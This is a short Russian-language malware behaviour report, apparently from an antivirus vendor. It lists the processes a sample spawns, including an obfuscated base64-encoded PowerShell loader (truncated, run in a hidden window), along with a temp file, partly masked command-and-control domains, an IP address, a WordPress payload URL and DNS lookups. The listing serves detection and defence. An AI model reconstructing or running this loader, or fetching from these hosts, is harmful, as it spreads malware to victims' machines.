Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABTAHUAMQAyADEAMAA5AD0AKAAoACcARgA3ADUAJwArACcAaAAwACcAKQArACcAZAA2ACcAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUAbgB2ADoAVQBTAGUAcgBQAFIATwBGAEkATABlAFwARQ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1932
- %TEMP%\1224249.cvr
- 'yo##el.com':443
- 'xi###ico.com':443
- 'sa#####consulting.in':80
- '35.##0.95.205':80
- http://www.sa#####consulting.in/wp-content/En/
- 'yo##el.com':443
- DNS ASK yo##el.com
- DNS ASK xi###ico.com
- DNS ASK on####ws24x7.com
- DNS ASK bl##.#igikhata.com
- DNS ASK te##.#ihchina.com
- DNS ASK sa#####consulting.in
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABTAHUAMQAyADEAMAA5AD0AKAAoACcARgA3ADUAJwArACcAaAAwACcAKQArACcAZAA2ACcAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUAbgB2ADoAVQBTAGUAcgBQAFIATwBGAEkATABlAFwARQ...' (со скрытым окном)